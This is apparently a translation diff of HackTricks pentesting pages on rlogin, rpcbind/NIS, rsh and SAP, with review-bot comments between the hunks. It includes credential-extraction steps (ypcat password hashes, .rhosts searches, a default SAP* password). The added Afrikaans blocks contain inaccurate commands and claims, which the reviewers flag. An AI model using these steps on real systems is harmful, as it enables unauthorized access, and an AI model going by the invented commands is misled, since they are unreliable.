-## Basic Information +## Basiese Inligting -In the past, **rlogin** was widely utilized for remote administration tasks. However, due to concerns regarding its security, it has largely been superseded by **slogin** and **ssh**. These newer methods provide enhanced security for remote connections. - -**Default port:** 513 +In die verlede is **rlogin** wyd gebruik vir afstandsadministrasietake. Tans is dit egter grootliks vervang deur **slogin** en **ssh** as gevolg van bekommernisse oor veiligheid. Hierdie nuwer metodes bied verbeterde veiligheid vir afstandsverbindinge. +**Verstekpoort:** 513 ``` PORT STATE SERVICE 513/tcp open login ``` +## **Aanteken** -## **Login** +Rlogin is 'n netwerkprotokol wat gebruik word om 'n veilige verbinding tussen 'n klient en 'n bediener tot stand te bring. Dit maak gebruik van 'n gebruikersnaam en wagwoord vir verifikasie. Hier is 'n paar belangrike punte om in gedagte te hou wanneer jy rlogin pentesting uitvoer: +- **Rhosts-lêer**: Rlogin maak gebruik van 'n lêer genaamd "rhosts" om vertroue tussen bedieners te vestig. Hierdie lêer bevat 'n lys van vertroude bedieners en die gebruikers wat toegang tot daardie bedieners het. Dit is belangrik om te kyk na die inhoud van hierdie lêer, aangesien dit 'n potensiële veiligheidsrisiko kan wees as dit nie behoorlik gekonfigureer is nie. + +- **Verifikasie**: Rlogin maak gebruik van 'n gebruikersnaam en wagwoord vir verifikasie. Dit is belangrik om swak wagwoorde te identifiseer en te verhoed dat aanvallers toegang tot die stelsel verkry deur middel van gekraakte wagwoorde. + +- **Man-in-die-middel-aanvalle**: Rlogin is vatbaar vir man-in-die-middel-aanvalle, waar 'n aanvaller die kommunikasie tussen die klient en die bediener kan onderskep en selfs wysig. Dit is belangrik om die kommunikasie te verseker deur middel van versleuteling of om alternatiewe protokolle te gebruik wat veiliger is. 
+ +- **Bruteforce-aanvalle**: Aanvallers kan bruteforce-aanvalle uitvoer om toegang tot 'n rlogin-stelsel te verkry deur verskeie wagwoorde te probeer. Dit is belangrik om sterk wagwoorde te gebruik en om maatreëls te tref om bruteforce-aanvalle te voorkom, soos die instelling van wagwoordvergrendeling of die gebruik van tweefaktorverifikasie. + +- **Sessiehantering**: Rlogin maak gebruik van sessies om die kommunikasie tussen die klient en die bediener te bestuur. Dit is belangrik om die sessiehantering te bestudeer en te verstaan, aangesien dit 'n potensiële aanvalsoppervlak kan wees. + +- **Verwante protokolle**: Rlogin is verwant aan ander protokolle soos rsh (remote shell) en rexec (remote execution). Dit is belangrik om die verwantskappe tussen hierdie protokolle te verstaan en om hul veiligheidsimplikasies te ondersoek. + +Deur hierdie punte in gedagte te hou en deur die nodige pentesting-tegnieke toe te pas, kan jy die veiligheid van 'n rlogin-stelsel ondersoek en verbeter. ```bash # Install client apt-get install rsh-client ``` - -You can use the following command to try to **login** to a remote host where **no password** is required for access. Try using **root** is as username: - +Jy kan die volgende bevel gebruik om te probeer om na 'n afgeleë gasheer in te teken waar geen wagwoord vereis word vir toegang nie. Probeer om die gebruikersnaam **root** te gebruik: ```bash rlogin -l ``` - ### [Brute force](../generic-methodologies-and-resources/brute-force.md#rlogin) -## Find files - +## Vind lêers ``` find / -name .rhosts ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
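Review bot: the `## **Aanteken**` hunk inserts a long block (`+Rlogin is 'n netwerkprotokol wat gebruik word om 'n veilige verbinding ...` through `+Deur hierdie punte in gedagte te hou ...`) that has no `-` counterpart in the English source, so it is new content rather than a translation and should be removed; it also calls rlogin a protocol for a "veilige verbinding" (secure connection), which contradicts the Basic Information paragraph in the same file stating it was superseded by `slogin` and `ssh` because of security concerns. Style: the blank lines separating `**Verstekpoort:** 513`, the headings and the fenced blocks are dropped in the `+` lines, so the translated section no longer matches the layout of the surrounding files.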
diff --git a/network-services-pentesting/pentesting-rpcbind.md b/network-services-pentesting/pentesting-rpcbind.md index bb3cc4524..12a59a1f2 100644 --- a/network-services-pentesting/pentesting-rpcbind.md +++ b/network-services-pentesting/pentesting-rpcbind.md @@ -2,37 +2,83 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -**Portmapper** is a service that is utilized for mapping network service ports to **RPC** (Remote Procedure Call) program numbers. It acts as a critical component in **Unix-based systems**, facilitating the exchange of information between these systems. The **port** associated with **Portmapper** is frequently scanned by attackers as it can reveal valuable information. This information includes the type of **Unix Operating System (OS)** running and details about the services that are available on the system. Additionally, **Portmapper** is commonly used in conjunction with **NFS (Network File System)**, **NIS (Network Information Service)**, and other **RPC-based services** to manage network services effectively. - -**Default port:** 111/TCP/UDP, 32771 in Oracle Solaris +**Portmapper** is 'n diens wat gebruik word om netwerkdienste-poorte na **RPC** (Remote Procedure Call) programnommers te karteer. Dit tree op as 'n kritieke komponent in **Unix-gebaseerde stelsels** en fasiliteer die uitruil van inligting tussen hierdie stelsels. Die **poort** wat met **Portmapper** geassosieer word, word gereeld deur aanvallers geskandeer, aangesien dit waardevolle inligting kan onthul. Hierdie inligting sluit in die tipe **Unix-bedryfstelsel (OS)** wat gebruik word en besonderhede oor die dienste wat beskikbaar is op die stelsel. Daarbenewens word **Portmapper** dikwels saam met **NFS (Network File System)**, **NIS (Network Information Service)** en ander **RPC-gebaseerde dienste** gebruik om netwerkdienste doeltreffend te bestuur. +**Verstekpoort:** 111/TCP/UDP, 32771 in Oracle Solaris ``` PORT STATE SERVICE 111/tcp open rpcbind ``` +## Opname -## Enumeration +RPCbind is 'n diens wat gebruik word om RPC-programme te registreer en te vind op 'n netwerk. Dit is 'n belangrike diens vir die kommunikasie tussen verskillende programme op 'n netwerk. 
Tydens 'n pentest kan die opname van RPCbind help om potensiële aanvalsoppervlaktes te identifiseer en te verken. +### Port Skandering + +Die standaardpoort vir RPCbind is 111. Dit is belangrik om hierdie poort te skandeer om te bepaal of die diens beskikbaar is op die teikenstelsel. + +### RPCbind-inligting opvraag + +Om inligting oor die RPCbind-diens op te vra, kan die volgende opdrag gebruik word: + +```plaintext +rpcinfo -p +``` + +Hierdie opdrag sal 'n lys van geregistreerde RPC-programme op die teikenstelsel gee, tesame met die poorte waarop hulle beskikbaar is. + +### RPCbind-poorte skandering + +Om die RPC-programme wat deur RPCbind geregistreer is, te skandeer, kan die volgende opdrag gebruik word: + +```plaintext +nmap -p --script rpcinfo +``` + +Hierdie opdrag sal die RPC-programme identifiseer wat deur RPCbind geregistreer is en beskikbaar is op die opgegee poorte. + +### RPCbind-verbindingsondersoek + +Om te bepaal watter programme verbind met RPCbind, kan die volgende opdrag gebruik word: + +```plaintext +rpcbind -l +``` + +Hierdie opdrag sal 'n lys van aktiewe verbindings na RPCbind gee, tesame met die programme wat daarmee verbind is. + +### RPCbind-gebruikersondersoek + +Om te bepaal watter gebruikers RPCbind gebruik, kan die volgende opdrag gebruik word: + +```plaintext +rpcinfo -u +``` + +Hierdie opdrag sal 'n lys van gebruikers toon wat RPCbind gebruik op die teikenstelsel. + +### RPCbind-veiligheidskwessies + +RPCbind kan sekuriteitskwessies veroorsaak as dit nie behoorlik geconfigureer is nie. Dit kan lei tot blootstelling van gevoelige inligting of selfs die uitvoering van aanvalle. Dit is belangrik om RPCbind te evalueer en te verseker dat dit behoorlik beveilig is op die teikenstelsel. 
``` rpcinfo irked.htb nmap -sSUC -p111 192.168.10.1 ``` - -Sometimes it doesn't give you any information, in other occasions you will get something like this: +Soms gee dit jou geen inligting nie, in ander gevalle sal jy iets soos hierdie kry: ![](<../.gitbook/assets/image (230).png>) 
@@ -42,23 +88,21 @@ Sometimes it doesn't give you any information, in other occasions you will get s ## RPCBind + NFS -If you find the service NFS then probably you will be able to list and download(and maybe upload) files: +As jy die diens NFS vind, sal jy waarskynlik in staat wees om lêers te lys en af te laai (en miskien op te laai): ![](<../.gitbook/assets/image (232).png>) -Read[ 2049 - Pentesting NFS service](nfs-service-pentesting.md) to learn more about how to test this protocol. +Lees [2049 - Pentesting NFS-diens](nfs-service-pentesting.md) om meer te wete te kom oor hoe om hierdie protokol te toets. ## NIS -Exploring **NIS** vulnerabilities involves a two-step process, starting with the identification of the service `ypbind`. The cornerstone of this exploration is uncovering the **NIS domain name**, without which progress is halted. +Die verkenning van **NIS** kwesbaarhede behels 'n tweestapproses, wat begin met die identifikasie van die diens `ypbind`. Die hoeksteen van hierdie verkenning is om die **NIS-domeinnaam** te ontdek, sonder die vordering tot stilstand kom. ![](<../.gitbook/assets/image (233).png>) +Die verkenningstog begin met die installering van nodige pakkette (`apt-get install nis`). Die volgende stap vereis die gebruik van `ypwhich` om die teenwoordigheid van die NIS-bediener te bevestig deur dit te ping met die domeinnaam en bediener IP, waarby hierdie elemente geanonimiseer moet word vir sekuriteit. -The exploration journey begins with the installation of necessary packages (`apt-get install nis`). The subsequent step requires using `ypwhich` to confirm the NIS server's presence by pinging it with the domain name and server IP, ensuring these elements are anonymized for security. - -The final and crucial step involves the `ypcat` command to extract sensitive data, particularly encrypted user passwords. These hashes, once cracked using tools like **John the Ripper**, reveal insights into system access and privileges. 
- +Die finale en kritieke stap behels die gebruik van die `ypcat`-opdrag om sensitiewe data te onttrek, veral versleutelde gebruikerswagwoorde. Hierdie hasings, sodra dit gekraak is met behulp van hulpmiddels soos **John the Ripper**, onthul insigte in stelseltoegang en voorregte. ```bash # Install NIS tools apt-get install nis 
@@ -67,73 +111,69 @@ ypwhich -d # Extract user credentials ypcat –d –h passwd.byname ``` +### NIF-lêers -### NIF files +| **Meesterlêer** | **Kaart(e)** | **Notas** | +| --------------- | ---------------------------- | ------------------------------------ | +| /etc/hosts | hosts.byname, hosts.byaddr | Bevat gasheernommers en IP-inligting | +| /etc/passwd | passwd.byname, passwd.byuid | NIS-gebruikerswagwoordlêer | +| /etc/group | group.byname, group.bygid | NIS-groepslêer | +| /usr/lib/aliases| mail.aliases | Besonderhede van posaliases | -| **Master file** | **Map(s)** | **Notes** | -| ---------------- | --------------------------- | --------------------------------- | -| /etc/hosts | hosts.byname, hosts.byaddr | Contains hostnames and IP details | -| /etc/passwd | passwd.byname, passwd.byuid | NIS user password file | -| /etc/group | group.byname, group.bygid | NIS group file | -| /usr/lib/aliases | mail.aliases | Details mail aliases | +## RPC-gebruikers -## RPC Users - -If you find the **rusersd** service listed like this: +As jy die **rusersd**-diens soos hier gelys vind: ![](<../.gitbook/assets/image (231).png>) -You could enumerate users of the box. To learn how read [1026 - Pentesting Rsusersd](1026-pentesting-rusersd.md). +Kan jy gebruikers van die boks opnoem. Lees [1026 - Pentesting Rsusersd](1026-pentesting-rusersd.md) om te leer hoe. -## Bypass Filtered Portmapper port - -When conducting a **nmap scan** and discovering open NFS ports with port 111 being filtered, direct exploitation of these ports is not feasible. However, by **simulating a portmapper service locally and creating a tunnel from your machine** to the target, exploitation becomes possible using standard tools. This technique allows for bypassing the filtered state of port 111, thus enabling access to NFS services. For detailed guidance on this method, refer to the article available at [this link](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc). 
+## Om die gefiltreerde Portmapper-poort te omseil +Wanneer jy 'n **nmap-scan** uitvoer en oop NFS-poorte met poort 111 wat gefiltreer word, is direkte uitbuiting van hierdie poorte nie moontlik nie. Deur egter **lokale simulasie van 'n portmapper-diens te skep en 'n tonnel van jou masjien na die teiken te skep**, word uitbuiting moontlik met behulp van standaardgereedskap. Hierdie tegniek maak dit moontlik om die gefiltreerde toestand van poort 111 te omseil en dus toegang tot NFS-dienste te verkry. Vir gedetailleerde leiding oor hierdie metode, raadpleeg die artikel beskikbaar by [hierdie skakel](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc). ## Shodan * `Portmap` -## Labs to practice +## Oefenlaboratoriums -* Practice these techniques in the [**Irked HTB machine**](https://app.hackthebox.com/machines/Irked). - -## HackTricks Automatic Commands +* Oefen hierdie tegnieke in die [**Irked HTB-masjien**](https://app.hackthebox.com/machines/Irked). +## HackTricks Outomatiese Opdragte ``` Protocol_Name: Portmapper #Protocol Abbreviation if there is one. Port_Number: 43 #Comma separated if there is more than one. Protocol_Description: PM or RPCBind #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for PortMapper - Note: | - Portmapper is a service that is utilized for mapping network service ports to RPC (Remote Procedure Call) program numbers. It acts as a critical component in Unix-based systems, facilitating the exchange of information between these systems. The port associated with Portmapper is frequently scanned by attackers as it can reveal valuable information. This information includes the type of Unix Operating System (OS) running and details about the services that are available on the system. Additionally, Portmapper is commonly used in conjunction with NFS (Network File System), NIS (Network Information Service), and other RPC-based services to manage network services effectively. 
+Name: Notes +Description: Notes for PortMapper +Note: | +Portmapper is a service that is utilized for mapping network service ports to RPC (Remote Procedure Call) program numbers. It acts as a critical component in Unix-based systems, facilitating the exchange of information between these systems. The port associated with Portmapper is frequently scanned by attackers as it can reveal valuable information. This information includes the type of Unix Operating System (OS) running and details about the services that are available on the system. Additionally, Portmapper is commonly used in conjunction with NFS (Network File System), NIS (Network Information Service), and other RPC-based services to manage network services effectively. - https://book.hacktricks.xyz/pentesting/pentesting-rpcbind +https://book.hacktricks.xyz/pentesting/pentesting-rpcbind Entry_2: - Name: rpc info - Description: May give netstat-type info - Command: whois -h {IP} -p 43 {Domain_Name} && echo {Domain_Name} | nc -vn {IP} 43 +Name: rpc info +Description: May give netstat-type info +Command: whois -h {IP} -p 43 {Domain_Name} && echo {Domain_Name} | nc -vn {IP} 43 Entry_3: - Name: nmap - Description: May give netstat-type info - Command: nmap -sSUC -p 111 {IP} +Name: nmap +Description: May give netstat-type info +Command: nmap -sSUC -p 111 {IP} ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
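Review bot: the `## Opname` section of pentesting-rpcbind.md adds a large block that has no counterpart in the English source (everything from `+RPCbind is 'n diens wat gebruik word om RPC-programme te registreer` through `+### RPCbind-veiligheidskwessies`), and the commands it introduces are not accurate: `rpcbind -l` is a daemon start-up flag that turns on libwrap connection logging, not a listing of active connections; `rpcinfo -u` takes a host and a program number and makes a test call over UDP, it does not list users; and `nmap -p --script rpcinfo` is missing the port value after `-p`. A translation PR should not add new technical content, so please drop that block and keep the section as a translation of the source's `rpcinfo irked.htb` / `nmap -sSUC -p111` example. In the same file, the `HackTricks Outomatiese Opdragte` YAML block lost its indentation: `- Name: Notes`, `- Description: ...`, `- Note: |` and the indented note text became unindented `+Name: Notes` lines directly under `Entry_1:`, which changes the YAML structure that the automatic-commands tooling parses; the fenced block should be copied byte-for-byte from the source. Minor wording: in the NIS paragraph, `sonder die vordering tot stilstand kom` should read `waarsonder vordering tot stilstand kom` to match "without which progress is halted".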
diff --git a/network-services-pentesting/pentesting-rsh.md b/network-services-pentesting/pentesting-rsh.md index 578f03589..666f65e21 100644 --- a/network-services-pentesting/pentesting-rsh.md +++ b/network-services-pentesting/pentesting-rsh.md @@ -2,50 +2,48 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -For authentication, **.rhosts** files along with **/etc/hosts.equiv** were utilized by **Rsh**. Authentication was dependent on IP addresses and the Domain Name System (DNS). The ease of spoofing IP addresses, notably on the local network, was a significant vulnerability. +Vir outentifikasie is **.rhosts**-lêers saam met **/etc/hosts.equiv** gebruik deur **Rsh**. Outentifikasie was afhanklik van IP-adresse en die Domain Name System (DNS). Die maklikheid van IP-adresvervalsing, veral op die plaaslike netwerk, was 'n beduidende kwesbaarheid. -Moreover, it was common for the **.rhosts** files to be placed within the home directories of users, which were often located on Network File System (NFS) volumes. +Verder was dit algemeen dat die **.rhosts**-lêers binne die tuisgids van gebruikers geplaas is, wat dikwels op Network File System (NFS)-volumes geleë was. -**Default port**: 514 - -## Login +**Verstekpoort**: 514 +## Aanteken ``` rsh rsh -l domain\user rsh domain/user@ rsh domain\\user@ ``` - ### [**Brute Force**](../generic-methodologies-and-resources/brute-force.md#rsh) -## References +## Verwysings * [https://www.ssh.com/ssh/rsh](https://www.ssh.com/ssh/rsh)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
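Review bot: in pentesting-rsh.md the blank line between `**Verstekpoort**: 514` and `## Aanteken`, and the blank line between the closing code fence and the `### [**Brute Force**]` heading, were dropped along with the translation; this pattern recurs across the patch (heading glued to the preceding paragraph or list). Please keep the source's blank lines around headings and fences so the translated pages render the same as the English ones.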
diff --git a/network-services-pentesting/pentesting-sap.md b/network-services-pentesting/pentesting-sap.md index 100a1a081..e3251f6d4 100644 --- a/network-services-pentesting/pentesting-sap.md +++ b/network-services-pentesting/pentesting-sap.md @@ -1,42 +1,39 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Introduction about SAP +# Inleiding oor SAP -SAP stands for Systems Applications and Products in Data Processing. SAP, by definition, is also the name of the ERP \(Enterprise Resource Planning\) software as well as the name of the company. -SAP system consists of a number of fully integrated modules, which covers virtually every aspect of business management. +SAP staan vir Stelseltoepassings en Produkte in Databehandeling. SAP is ook die naam van die ERP \(Enterprise Resource Planning\) sagteware, sowel as die naam van die maatskappy. +Die SAP-stelsel bestaan uit 'n aantal ten volle geïntegreerde modules wat byna elke aspek van besigheidsbestuur dek. -Each SAP instance \(or SID\) is composed of three layers: database, application and presentation\), each landscape usually consists of four instances: dev, test, QA and production. -Each of the layers can be exploited to some extent, but most effect can be gained by **attacking the database**. +Elke SAP-instansie \(of SID\) bestaan uit drie lae: databasis, toepassing en aanbieding\), elke landskap bestaan gewoonlik uit vier instansies: dev, toets, QA en produksie. +Elkeen van die lae kan tot 'n mate uitgebuit word, maar die meeste effek kan verkry word deur **die databasis aan te val**. -Each SAP instance is divided into clients. Each one has a user SAP\*, the application’s equivalent of “root”. -Upon initial creation, this user SAP\* gets a default password: “060719992” \(more default password below\). -You’d be surprised if you knew how often these **passwords aren’t changed in test or dev environments**! +Elke SAP-instansie is verdeel in kliënte. Elkeen het 'n gebruiker SAP\*, die toepassing se ekwivalent van "root". +By die aanvanklike skepping kry hierdie gebruiker SAP\* 'n verstek wagwoord: "060719992" \(meer verstek wagwoorde hieronder\). +Jy sal verbaas wees as jy weet hoe dikwels hierdie **wagwoorde nie verander word in toets- of ontwikkelingsomgewings** nie! 
-Try to get access to the shell of any server using username <SID>adm. -Bruteforcing can help, whoever there can be Account Lockout mechanism. +Probeer om toegang tot die skulp van enige bediener te kry deur die gebruikersnaam <SID>adm te gebruik. +Bruteforcing kan help, maar daar kan 'n rekeningblokkering meganisme wees. -# Discovery +# Ontdekking -> Next section is mostly from [https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures) from user shipcod3! - -* Check the Application Scope or Program Brief for testing. Take note of the hostnames or system instances for connecting to SAP GUI. -* Use OSINT \(open source intelligence\), Shodan and Google Dorks to check for files, subdomains, and juicy information if the application is Internet-facing or public: +> Die volgende afdeling is meestal van [https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures) deur gebruiker shipcod3! +* Kontroleer die Toepassingsomvang of Programbeknopte vir toetsing. Neem kennis van die hostnames of stelselinstansies vir die koppeling met SAP GUI. +* Gebruik OSINT \(open source intelligence\), Shodan en Google Dorks om lêers, subdomeine en interessante inligting te kontroleer as die toepassing aan die internet blootgestel of openbaar is: ```text inurl:50000/irj/portal inurl:IciEventService/IciEventConf 
